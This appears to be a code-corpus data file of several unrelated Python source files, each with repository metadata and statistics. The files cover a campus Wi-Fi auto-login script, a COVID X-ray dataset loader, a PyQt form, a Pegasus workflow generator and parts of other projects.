rob.close() | 32.213333 | 124 | 0.577815 | 416 | 2,416 | 3.240385 | 0.338942 | 0.01632 | 0.067507 | 0.083086 | 0.395401 | 0.333086 | 0.179525 | 0.179525 | 0.152819 | 0.152819 | 0 | 0.207187 | 0.262831 | 2,416 | 75 | 125 | 32.213333 | 0.549691 | 0.243377 | 0 | 0.326087 | 0 | 0 | 0.024834 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.065217 | 0 | 0.065217 | 0.021739 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a13428de836fe2ca966877503cf126c867ad3cd6 | 531 | py | Python | xos/synchronizers/openstack/model_policies/model_policy_Sliver.py | xmaruto/mcord | 3678a3d10c3703c2b73f396c293faebf0c82a4f4 | [
"Apache-2.0"
] | null | null | null | xos/synchronizers/openstack/model_policies/model_policy_Sliver.py | xmaruto/mcord | 3678a3d10c3703c2b73f396c293faebf0c82a4f4 | [
"Apache-2.0"
] | null | null | null | xos/synchronizers/openstack/model_policies/model_policy_Sliver.py | xmaruto/mcord | 3678a3d10c3703c2b73f396c293faebf0c82a4f4 | [
"Apache-2.0"
] | null | null | null |
def handle(instance):
from core.models import Controller, ControllerSlice, ControllerNetwork, NetworkSlice
networks = [ns.network for ns in NetworkSlice.objects.filter(slice=instance.slice)]
controller_networks = ControllerNetwork.objects.filter(network__in=networks,
controller=instance.node.site_deployment.controller)
for cn in controller_networks:
if (cn.lazy_blocked):
cn.lazy_blocked=False
cn.backend_register = '{}'
cn.save()
| 37.928571 | 116 | 0.6742 | 55 | 531 | 6.363636 | 0.545455 | 0.074286 | 0.074286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.242938 | 531 | 13 | 117 | 40.846154 | 0.870647 | 0 | 0 | 0 | 0 | 0 | 0.003774 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.1 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a137958aa6262c5d4af45fea5f852cfe4e0fb7c7 | 5,509 | py | Python | plugin/autoWHUT.py | PPeanutButter/MediaServer | a6a0b3f424ca3fc4ea73d78db380ec3cc882bfd2 | [
"MIT"
] | 2 | 2021-09-23T15:09:25.000Z | 2022-01-16T01:04:07.000Z | plugin/autoWHUT.py | PPeanutButter/MediaServer | a6a0b3f424ca3fc4ea73d78db380ec3cc882bfd2 | [
"MIT"
] | 1 | 2022-02-23T04:00:16.000Z | 2022-02-23T04:10:06.000Z | plugin/autoWHUT.py | PPeanutButter/MediaServer | a6a0b3f424ca3fc4ea73d78db380ec3cc882bfd2 | [
"MIT"
] | 1 | 2021-09-23T15:09:26.000Z | 2021-09-23T15:09:26.000Z | # coding=<utf-8>
import requests
import re
import socket
import base64
import psutil
import pywifi
from pywifi import const
import subprocess
import os
import time
def get_host_ip():
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(('8.8.8.8', 80))
ip = s.getsockname()[0]
finally:
s.close()
return ip
def encrypt(password):
password = base64.b64encode(password.encode('utf-8'))
return password.decode('utf-8')
def getNetIfAddr():
dic = psutil.net_if_addrs()
mac = ''
for adapter in dic:
print(adapter)
if adapter != 'wls1':
continue
snicList = dic[adapter]
mac = ''
ipv4 = ''
ipv6 = ''
for snic in snicList:
if snic.family.name in {'AF_LINK', 'AF_PACKET'}:
mac = snic.address
elif snic.family.name == 'AF_INET':
ipv4 = snic.address
elif snic.family.name == 'AF_INET6':
ipv6 = snic.address
print('%s, %s, %s, %s' % (adapter, mac, ipv4, ipv6))
return mac
def get_mac_address():
return getNetIfAddr().lower()
class AutoWHUT:
def get_param(self, username: str, password: str, cookies: str):
header = {
'Origin': 'http://172.30.16.34',
'Referer': 'http://172.30.16.34/srun_portal_pc.php?ac_id=1&cmd=login&switchip=172.30.14.104&mac=84:ef:18'
':91:e5:5b&ip=' + get_host_ip() +
'&essid=WHUT-WLAN6&apname=JB-JH-J4-0901-E&apgroup=WHUT-WLAN-Dual&url=http://www.gstatic.com'
'/generate_204',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) '
'Chrome/70.0.3538.102 Safari/537.36 Edge/18.18362',
'Accept': '*/*',
'Accept-Language': 'zh-CN',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
'X-Requested-With': 'XMLHttpRequest',
'Accept-Encoding': 'gzip, deflate',
'Host': '172.30.16.34',
'Connection': 'Keep-Alive',
'Pragma': 'no-cache',
'Cookie': cookies
}
data = 'action=login&username=&password=&ac_id=64&user_ip=&nas_ip=&user_mac=&save_me=1&ajax=1'
data = re.sub("username=.*?&", "username=" + username + '&', data)
data = re.sub("password=.*?&", "password={B}" + encrypt(password) + '&', data)
data = re.sub("user_ip=.*?&", "user_ip=" + get_host_ip() + '&', data)
data = re.sub("user_mac=.*?&", "user_mac=" + get_mac_address() + '&', data)
return header, data
def sign_in(self):
try:
username = ''
password = ''
cookies = 'login=bQ0pOyR6IXU7PJaQQqRAcBPxGAvxAcrvEe0UJsVvdkTHxMBomR2HUS3oxriFtDiSt7XrDS' \
'%2BmurcIcGKHmgRZbb8fUGzw%2FUGvJFIjk0nAVIEwPGYVt7br7b5u1t4sMp' \
'%2BAfr4VZ5VcKPDr8eaBrOt2YRrH9Bdy6bogpY89dPj' \
'%2BzwrVuc4xmFUoWD8peECGHshewZRrIVvucbx652F2TRxF3VtHNL9H0fs5GjjmJjQMtecd; ' \
'NSC_tsvo_4l_TH=ffffffffaf160e3a45525d5f4f58455e445a4a423660; ' \
'login=bQ0pOyR6IXU7PJaQQqRAcBPxGAvxAcrvEe0UJsVvdkTHxMBomR2HUS3oxriFtDiSt7XrDS' \
'%2BmurcIcGKHmgRZbb8fUGzw%2FUGvJFIjk0nAVIEwPGYVt7br7b5u1t4sMp' \
'%2BAfr4VZ5VcKPDr8eaBrOt2YRrH9Bdy6bogpY89dPj' \
'%2BzwrVuc4xmFUoWD8peECGHshewZRrIVvucbx652F2TRxF3VtHNL9H0fs5GjjmJjQMtecd '
header, data = self.get_param(username, password, cookies)
print(data)
result = requests.post('http://172.30.16.34/include/auth_action.php', headers=header, data=data)
print(result.text, '\n{}\n'.format('*' * 79), result.encoding)
except BaseException as arg:
print(arg)
class WifiManager:
def __init__(self):
self.wifi = pywifi.PyWiFi()
self.ifaces = self.wifi.interfaces()[1]
self.autoWHUT = AutoWHUT()
self.sleepTime = 1
def is_connected_wifi(self):
return self.ifaces.status() == const.IFACE_CONNECTED
def get_current_wifi(self):
cmd = 'netsh wlan show interfaces'
p = subprocess.Popen(cmd,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=True)
ret = p.stdout.read()
ret = ret.decode('gbk')
index = ret.find("SSID")
if index > 0:
return ret[index:].split(':')[1].split('\r\n')[0].strip()
else:
return None
def check_net(self):
try:
result = requests.post('http://www.baidu.com')
return result.text.find("?cmd=redirect") == -1
except Exception:
return False
def auto_check(self):
if self.is_connected_wifi():
if not self.check_net():
self.autoWHUT.sign_in()
print("2s")
self.sleepTime = 2
else:
self.sleepTime = 60
print("60s")
else:
self.sleepTime = 4
print("no wifi")
def start(self):
while True:
self.auto_check()
time.sleep(self.sleepTime)
if __name__ == '__main__':
wifiManager = WifiManager()
wifiManager.start()
| 34.43125 | 117 | 0.554547 | 570 | 5,509 | 5.250877 | 0.419298 | 0.008353 | 0.009355 | 0.012028 | 0.208821 | 0.18443 | 0.020715 | 0 | 0 | 0 | 0 | 0.064269 | 0.313669 | 5,509 | 159 | 118 | 34.647799 | 0.727321 | 0.002541 | 0 | 0.088889 | 0 | 0.02963 | 0.278718 | 0.123794 | 0 | 0 | 0 | 0 | 0 | 1 | 0.088889 | false | 0.059259 | 0.074074 | 0.014815 | 0.251852 | 0.059259 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
a1385e4aefd67a6e8363bc3fce53670aa1ea871f | 6,861 | py | Python | covidaid/tools/read_data.py | sabuj7177/CovidProject | b4b7bcfa5ace165520507f489dc74da7b695e2f0 | [
"Apache-2.0"
] | null | null | null | covidaid/tools/read_data.py | sabuj7177/CovidProject | b4b7bcfa5ace165520507f489dc74da7b695e2f0 | [
"Apache-2.0"
] | null | null | null | covidaid/tools/read_data.py | sabuj7177/CovidProject | b4b7bcfa5ace165520507f489dc74da7b695e2f0 | [
"Apache-2.0"
] | null | null | null | # encoding: utf-8
"""
Read images and corresponding labels.
"""
import torch
from torch.utils.data import Dataset
from PIL import Image
import os
import random
class ChestXrayDataSetTest(Dataset):
def __init__(self, image_list_file, transform=None, combine_pneumonia=False):
"""
Create the Data Loader.
Since class 3 (Covid) has limited covidaid_data, dataset size will be accordingly at train time.
Code is written in generic form to assume last class as the rare class
Args:
image_list_file: path to the file containing images
with corresponding labels.
transform: optional transform to be applied on a sample.
combine_pneumonia: True for combining Baterial and Viral Pneumonias into one class
"""
self.NUM_CLASSES = 3 if combine_pneumonia else 4
# Set of images for each class
image_names = []
with open(image_list_file, "r") as f:
for line in f:
items = line.split()
image_name = items[0]
label = int(items[1])
image_names.append((image_name, label))
self.image_names = image_names
self.transform = transform
def __getitem__(self, index):
"""
Args:
index: the index of item
Returns:
image and its labels
"""
def __one_hot_encode(l):
v = [0] * self.NUM_CLASSES
v[l] = 1
return v
image_name, label = self.image_names[index]
label = __one_hot_encode(label)
image = Image.open(image_name).convert('RGB')
if self.transform is not None:
image = self.transform(image)
return image, torch.FloatTensor(label)
def __len__(self):
return len(self.image_names)
class ChestXrayDataSet(Dataset):
def __init__(self, image_list_file, transform=None, combine_pneumonia=False):
"""
Create the Data Loader.
Since class 3 (Covid) has limited covidaid_data, dataset size will be accordingly at train time.
Code is written in generic form to assume last class as the rare class
Args:
image_list_file: path to the file containing images
with corresponding labels.
transform: optional transform to be applied on a sample.
combine_pneumonia: True for combining Baterial and Viral Pneumonias into one class
"""
self.NUM_CLASSES = 3 if combine_pneumonia else 4
# Set of images for each class
image_names = [[] for _ in range(self.NUM_CLASSES)]
with open(image_list_file, "r") as f:
for line in f:
items = line.split()
image_name = items[0]
label = int(items[1])
image_names[label].append(image_name)
self.image_names = image_names
self.transform = transform
label_dist = [len(cnames) for cnames in image_names]
# Number of images of each class desired
self.num_covid = int(label_dist[-1])
if combine_pneumonia:
covid_factor = 7.0
self.num_normal = int(self.num_covid * covid_factor)
self.num_pneumonia = int(self.num_covid * covid_factor)
self.total = self.num_covid + self.num_pneumonia + self.num_normal
self.loss_weight_minus = torch.FloatTensor([self.num_normal, self.num_pneumonia, self.num_covid]).unsqueeze(0).cuda() / self.total
self.loss_weight_plus = 1.0 - self.loss_weight_minus
else:
covid_factor = 5.0
self.num_normal = int(self.num_covid * covid_factor)
self.num_viral = int(self.num_covid * covid_factor)
self.num_bact = int(self.num_covid * covid_factor)
self.total = self.num_covid + self.num_viral + self.num_bact + self.num_normal
self.loss_weight_minus = torch.FloatTensor([self.num_normal, self.num_bact, self.num_viral, self.num_covid]).unsqueeze(0).cuda() / self.total
self.loss_weight_plus = 1.0 - self.loss_weight_minus
# print (self.loss_weight_plus, self.loss_weight_minus)
if combine_pneumonia:
self.partitions = [self.num_covid,
self.num_covid + self.num_normal,
self.num_covid + self.num_normal + self.num_pneumonia]
else:
self.partitions = [self.num_covid,
self.num_covid + self.num_normal,
self.num_covid + self.num_normal + self.num_bact,
self.num_covid + self.num_normal + self.num_bact + self.num_viral]
assert len(self.partitions) == self.NUM_CLASSES
def __getitem__(self, index):
"""
Args:
index: the index of item
Returns:
image and its labels
"""
def __one_hot_encode(l):
v = [0] * self.NUM_CLASSES
v[l] = 1
return v
image_name = None
# print (index, self.partitions, len(self), sum([len(cnames) for cnames in self.image_names]))
if index < self.partitions[0]:
# Return a covid image
data_idx = index
image_name = self.image_names[self.NUM_CLASSES - 1][data_idx]
label = __one_hot_encode(self.NUM_CLASSES - 1)
else:
# Return non-covid image
for l in range(1, self.NUM_CLASSES):
if index < self.partitions[l]:
class_idx = l - 1
label = __one_hot_encode(class_idx)
# Return a random image
image_name = random.choice(self.image_names[class_idx])
break
assert image_name is not None
image = Image.open(image_name).convert('RGB')
if self.transform is not None:
image = self.transform(image)
return image, torch.FloatTensor(label)
def __len__(self):
return self.partitions[-1]
def loss(self, output, target):
"""
Binary weighted cross-entropy loss for each class
"""
weight_plus = torch.autograd.Variable(self.loss_weight_plus.repeat(1, target.size(0)).view(-1, self.loss_weight_plus.size(1)).cuda())
weight_neg = torch.autograd.Variable(self.loss_weight_minus.repeat(1, target.size(0)).view(-1, self.loss_weight_minus.size(1)).cuda())
loss = output
pmask = (target >= 0.5).data
nmask = (target < 0.5).data
epsilon = 1e-15
loss[pmask] = (loss[pmask] + epsilon).log() * weight_plus[pmask]
loss[nmask] = (1-loss[nmask] + epsilon).log() * weight_plus[nmask]
loss = -loss.sum()
return loss
| 36.887097 | 153 | 0.594957 | 868 | 6,861 | 4.490783 | 0.176267 | 0.08979 | 0.052335 | 0.036942 | 0.705747 | 0.680862 | 0.64982 | 0.64982 | 0.617753 | 0.612365 | 0 | 0.010267 | 0.318612 | 6,861 | 185 | 154 | 37.086486 | 0.823529 | 0.208424 | 0 | 0.490385 | 0 | 0 | 0.001556 | 0 | 0 | 0 | 0 | 0 | 0.019231 | 1 | 0.086538 | false | 0 | 0.048077 | 0.019231 | 0.221154 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a13baec342fa639fe6142ecd977281a346771177 | 389 | py | Python | genshimacro/__init__.py | trac-hacks/trac-GenshiMacro | d9da1a50f6d73904fdda2e9e7cbc4c056b929267 | [
"BSD-3-Clause"
] | 1 | 2015-02-19T21:08:53.000Z | 2015-02-19T21:08:53.000Z | genshimacro/__init__.py | ejucovy/trac-GenshiMacro | d9da1a50f6d73904fdda2e9e7cbc4c056b929267 | [
"BSD-3-Clause"
] | null | null | null | genshimacro/__init__.py | ejucovy/trac-GenshiMacro | d9da1a50f6d73904fdda2e9e7cbc4c056b929267 | [
"BSD-3-Clause"
] | null | null | null | from genshi.template import MarkupTemplate
from trac.core import *
from trac.web.chrome import Chrome
from trac.wiki.macros import WikiMacroBase
class GenshiMacro(WikiMacroBase):
def expand_macro(self, formatter, name, text, args):
template = MarkupTemplate(text)
chrome = Chrome(self.env)
return template.generate(**chrome.populate_data(formatter.req, {}))
| 29.923077 | 75 | 0.742931 | 47 | 389 | 6.106383 | 0.595745 | 0.083624 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.164524 | 389 | 12 | 76 | 32.416667 | 0.883077 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.444444 | 0 | 0.777778 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
a13f0a11b4555fcfbf9c924b7e7de9f674331ec4 | 8,678 | py | Python | src/_sever_qt4.py | Joy917/fast-transfer | dfbcf5c4239da3d550b721500dff05fb6d40b756 | [
"MIT"
] | null | null | null | src/_sever_qt4.py | Joy917/fast-transfer | dfbcf5c4239da3d550b721500dff05fb6d40b756 | [
"MIT"
] | null | null | null | src/_sever_qt4.py | Joy917/fast-transfer | dfbcf5c4239da3d550b721500dff05fb6d40b756 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'D:\SVNzhangy\fast-transfer\src\_sever.ui'
#
# Created by: PyQt4 UI code generator 4.11.4
#
# WARNING! All changes made in this file will be lost!
from PySide import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
try:
_encoding = QtGui.QApplication.UnicodeUTF8
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig)
class Ui_Form(object):
def setupUi(self, Form):
Form.setObjectName(_fromUtf8("Form"))
Form.resize(798, 732)
self.gridLayout = QtGui.QGridLayout(Form)
self.gridLayout.setObjectName(_fromUtf8("gridLayout"))
self.groupBox_2 = QtGui.QGroupBox(Form)
self.groupBox_2.setObjectName(_fromUtf8("groupBox_2"))
self.verticalLayout_2 = QtGui.QVBoxLayout(self.groupBox_2)
self.verticalLayout_2.setObjectName(_fromUtf8("verticalLayout_2"))
self.horizontalLayout = QtGui.QHBoxLayout()
self.horizontalLayout.setObjectName(_fromUtf8("horizontalLayout"))
spacerItem = QtGui.QSpacerItem(20, 20, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Minimum)
self.horizontalLayout.addItem(spacerItem)
self.checkBox_time = QtGui.QCheckBox(self.groupBox_2)
self.checkBox_time.setObjectName(_fromUtf8("checkBox_time"))
self.horizontalLayout.addWidget(self.checkBox_time)
self.dateTimeEdit_start = QtGui.QDateTimeEdit(self.groupBox_2)
self.dateTimeEdit_start.setDateTime(QtCore.QDateTime(QtCore.QDate(2017, 1, 1), QtCore.QTime(0, 0, 0)))
self.dateTimeEdit_start.setCalendarPopup(True)
self.dateTimeEdit_start.setObjectName(_fromUtf8("dateTimeEdit_start"))
self.horizontalLayout.addWidget(self.dateTimeEdit_start)
self.label_2 = QtGui.QLabel(self.groupBox_2)
self.label_2.setObjectName(_fromUtf8("label_2"))
self.horizontalLayout.addWidget(self.label_2)
self.dateTimeEdit_end = QtGui.QDateTimeEdit(self.groupBox_2)
self.dateTimeEdit_end.setDateTime(QtCore.QDateTime(QtCore.QDate(2018, 1, 1), QtCore.QTime(0, 0, 0)))
self.dateTimeEdit_end.setCalendarPopup(True)
self.dateTimeEdit_end.setObjectName(_fromUtf8("dateTimeEdit_end"))
self.horizontalLayout.addWidget(self.dateTimeEdit_end)
spacerItem1 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.horizontalLayout.addItem(spacerItem1)
self.verticalLayout_2.addLayout(self.horizontalLayout)
self.horizontalLayout_3 = QtGui.QHBoxLayout()
self.horizontalLayout_3.setObjectName(_fromUtf8("horizontalLayout_3"))
spacerItem2 = QtGui.QSpacerItem(20, 20, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Minimum)
self.horizontalLayout_3.addItem(spacerItem2)
self.checkBox_ip = QtGui.QCheckBox(self.groupBox_2)
self.checkBox_ip.setObjectName(_fromUtf8("checkBox_ip"))
self.horizontalLayout_3.addWidget(self.checkBox_ip)
self.lineEdit_ip = QtGui.QLineEdit(self.groupBox_2)
self.lineEdit_ip.setObjectName(_fromUtf8("lineEdit_ip"))
self.horizontalLayout_3.addWidget(self.lineEdit_ip)
spacerItem3 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.MinimumExpanding, QtGui.QSizePolicy.Minimum)
self.horizontalLayout_3.addItem(spacerItem3)
self.verticalLayout_2.addLayout(self.horizontalLayout_3)
self.horizontalLayout_4 = QtGui.QHBoxLayout()
self.horizontalLayout_4.setObjectName(_fromUtf8("horizontalLayout_4"))
spacerItem4 = QtGui.QSpacerItem(20, 20, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Minimum)
self.horizontalLayout_4.addItem(spacerItem4)
self.checkBox_fuzzy = QtGui.QCheckBox(self.groupBox_2)
self.checkBox_fuzzy.setObjectName(_fromUtf8("checkBox_fuzzy"))
self.horizontalLayout_4.addWidget(self.checkBox_fuzzy)
self.lineEdit_fuzzysearch = QtGui.QLineEdit(self.groupBox_2)
self.lineEdit_fuzzysearch.setObjectName(_fromUtf8("lineEdit_fuzzysearch"))
self.horizontalLayout_4.addWidget(self.lineEdit_fuzzysearch)
spacerItem5 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.horizontalLayout_4.addItem(spacerItem5)
self.verticalLayout_2.addLayout(self.horizontalLayout_4)
self.gridLayout.addWidget(self.groupBox_2, 1, 0, 1, 2)
self.groupBox = QtGui.QGroupBox(Form)
self.groupBox.setObjectName(_fromUtf8("groupBox"))
self.verticalLayout = QtGui.QVBoxLayout(self.groupBox)
self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
self.textBrowser_log = QtGui.QTextBrowser(self.groupBox)
self.textBrowser_log.viewport().setProperty("cursor", QtGui.QCursor(QtCore.Qt.IBeamCursor))
self.textBrowser_log.setMouseTracking(True)
self.textBrowser_log.setObjectName(_fromUtf8("textBrowser_log"))
self.verticalLayout.addWidget(self.textBrowser_log)
self.horizontalLayout_2 = QtGui.QHBoxLayout()
self.horizontalLayout_2.setObjectName(_fromUtf8("horizontalLayout_2"))
self.lineEdit_pagenumStart = QtGui.QLineEdit(self.groupBox)
self.lineEdit_pagenumStart.setMaximumSize(QtCore.QSize(50, 16777215))
self.lineEdit_pagenumStart.setObjectName(_fromUtf8("lineEdit_pagenumStart"))
self.horizontalLayout_2.addWidget(self.lineEdit_pagenumStart)
self.label_3 = QtGui.QLabel(self.groupBox)
self.label_3.setMaximumSize(QtCore.QSize(20, 16777215))
self.label_3.setObjectName(_fromUtf8("label_3"))
self.horizontalLayout_2.addWidget(self.label_3)
self.lineEdit_pagenumEnd = QtGui.QLineEdit(self.groupBox)
self.lineEdit_pagenumEnd.setMaximumSize(QtCore.QSize(50, 16777215))
self.lineEdit_pagenumEnd.setObjectName(_fromUtf8("lineEdit_pagenumEnd"))
self.horizontalLayout_2.addWidget(self.lineEdit_pagenumEnd)
spacerItem6 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.horizontalLayout_2.addItem(spacerItem6)
self.pushButton_pageup = QtGui.QPushButton(self.groupBox)
self.pushButton_pageup.setObjectName(_fromUtf8("pushButton_pageup"))
self.horizontalLayout_2.addWidget(self.pushButton_pageup)
self.pushButton_pagedown = QtGui.QPushButton(self.groupBox)
self.pushButton_pagedown.setObjectName(_fromUtf8("pushButton_pagedown"))
self.horizontalLayout_2.addWidget(self.pushButton_pagedown)
self.verticalLayout.addLayout(self.horizontalLayout_2)
self.gridLayout.addWidget(self.groupBox, 0, 0, 1, 2)
self.horizontalLayout_5 = QtGui.QHBoxLayout()
self.horizontalLayout_5.setObjectName(_fromUtf8("horizontalLayout_5"))
self.label_notice = QtGui.QLabel(Form)
self.label_notice.setMinimumSize(QtCore.QSize(600, 0))
self.label_notice.setObjectName(_fromUtf8("label_notice"))
self.horizontalLayout_5.addWidget(self.label_notice)
spacerItem7 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.horizontalLayout_5.addItem(spacerItem7)
self.pushButton_check = QtGui.QPushButton(Form)
self.pushButton_check.setObjectName(_fromUtf8("pushButton_check"))
self.horizontalLayout_5.addWidget(self.pushButton_check)
self.gridLayout.addLayout(self.horizontalLayout_5, 2, 0, 1, 2)
self.retranslateUi(Form)
QtCore.QMetaObject.connectSlotsByName(Form)
def retranslateUi(self, Form):
Form.setWindowTitle(_translate("Form", "LogManager", None))
self.groupBox_2.setTitle(_translate("Form", "Search Setting", None))
self.checkBox_time.setText(_translate("Form", "time:", None))
self.label_2.setText(_translate("Form", "-----", None))
self.checkBox_ip.setText(_translate("Form", "IP: ", None))
self.checkBox_fuzzy.setText(_translate("Form", "fuzzy:", None))
self.groupBox.setTitle(_translate("Form", "Log Display", None))
self.label_3.setText(_translate("Form", "---", None))
self.pushButton_pageup.setText(_translate("Form", "page up ", None))
self.pushButton_pagedown.setText(_translate("Form", "page down", None))
self.label_notice.setText(_translate("Form", "Notice:", None))
self.pushButton_check.setText(_translate("Form", "Check", None))
| 58.635135 | 110 | 0.735999 | 931 | 8,678 | 6.663802 | 0.161117 | 0.122502 | 0.02724 | 0.024662 | 0.39813 | 0.305287 | 0.208897 | 0.135074 | 0.135074 | 0.124758 | 0 | 0.029596 | 0.155105 | 8,678 | 147 | 111 | 59.034014 | 0.816558 | 0.024314 | 0 | 0.045113 | 1 | 0 | 0.062537 | 0.002483 | 0 | 0 | 0 | 0 | 0 | 1 | 0.037594 | false | 0 | 0.007519 | 0.022556 | 0.075188 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a146f1a5836a0723e015b88316d930723a68dc51 | 1,464 | py | Python | share/pegasus/init/split/daxgen.py | fengggli/pegasus | b68f588d90eb2b832086ed627d61414691f8ba95 | [
"Apache-2.0"
] | null | null | null | share/pegasus/init/split/daxgen.py | fengggli/pegasus | b68f588d90eb2b832086ed627d61414691f8ba95 | [
"Apache-2.0"
] | null | null | null | share/pegasus/init/split/daxgen.py | fengggli/pegasus | b68f588d90eb2b832086ed627d61414691f8ba95 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
import os
import pwd
import sys
import time
from Pegasus.DAX3 import *
# The name of the DAX file is the first argument
if len(sys.argv) != 2:
sys.stderr.write("Usage: %s DAXFILE\n" % (sys.argv[0]))
sys.exit(1)
daxfile = sys.argv[1]
USER = pwd.getpwuid(os.getuid())[0]
# Create a abstract dag
dax = ADAG("split")
# Add some workflow-level metadata
dax.metadata("creator", "%s@%s" % (USER, os.uname()[1]))
dax.metadata("created", time.ctime())
webpage = File("pegasus.html")
# the split job that splits the webpage into smaller chunks
split = Job("split")
split.addArguments("-l","100","-a","1",webpage,"part.")
split.uses(webpage, link=Link.INPUT)
# associate the label with the job. all jobs with same label
# are run with PMC when doing job clustering
split.addProfile( Profile("pegasus","label","p1"))
dax.addJob(split)
# we do a parmeter sweep on the first 4 chunks created
for c in "abcd":
part = File("part.%s" % c)
split.uses(part, link=Link.OUTPUT, transfer=False, register=False)
count = File("count.txt.%s" % c)
wc = Job("wc")
wc.addProfile( Profile("pegasus","label","p1"))
wc.addArguments("-l",part)
wc.setStdout(count)
wc.uses(part, link=Link.INPUT)
wc.uses(count, link=Link.OUTPUT, transfer=True, register=True)
dax.addJob(wc)
#adding dependency
dax.depends(wc, split)
f = open(daxfile, "w")
dax.writeXML(f)
f.close()
print "Generated dax %s" %daxfile
| 25.684211 | 70 | 0.672814 | 230 | 1,464 | 4.282609 | 0.482609 | 0.032487 | 0.026396 | 0.058883 | 0.062944 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011438 | 0.163934 | 1,464 | 56 | 71 | 26.142857 | 0.793301 | 0.240437 | 0 | 0 | 0 | 0 | 0.13146 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.142857 | null | null | 0.028571 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a147e22d5aeaabe35ccc4c56ea5539f536e24407 | 3,685 | py | Python | lbrynet/wallet/ledger.py | ttkopec/lbry | 03415415ed397730e6f691f527f51b429a834ed5 | [
"MIT"
] | null | null | null | lbrynet/wallet/ledger.py | ttkopec/lbry | 03415415ed397730e6f691f527f51b429a834ed5 | [
"MIT"
] | 110 | 2018-11-26T05:41:35.000Z | 2021-08-03T15:37:20.000Z | lbrynet/wallet/ledger.py | ttkopec/lbry | 03415415ed397730e6f691f527f51b429a834ed5 | [
"MIT"
] | 1 | 2018-09-20T22:15:59.000Z | 2018-09-20T22:15:59.000Z | import logging
from six import int2byte
from binascii import unhexlify
from twisted.internet import defer
from .resolve import Resolver
from lbryschema.error import URIParseError
from lbryschema.uri import parse_lbry_uri
from torba.baseledger import BaseLedger
from .account import Account
from .network import Network
from .database import WalletDatabase
from .transaction import Transaction
from .header import Headers, UnvalidatedHeaders
log = logging.getLogger(__name__)
class MainNetLedger(BaseLedger):
name = 'LBRY Credits'
symbol = 'LBC'
network_name = 'mainnet'
account_class = Account
database_class = WalletDatabase
headers_class = Headers
network_class = Network
transaction_class = Transaction
secret_prefix = int2byte(0x1c)
pubkey_address_prefix = int2byte(0x55)
script_address_prefix = int2byte(0x7a)
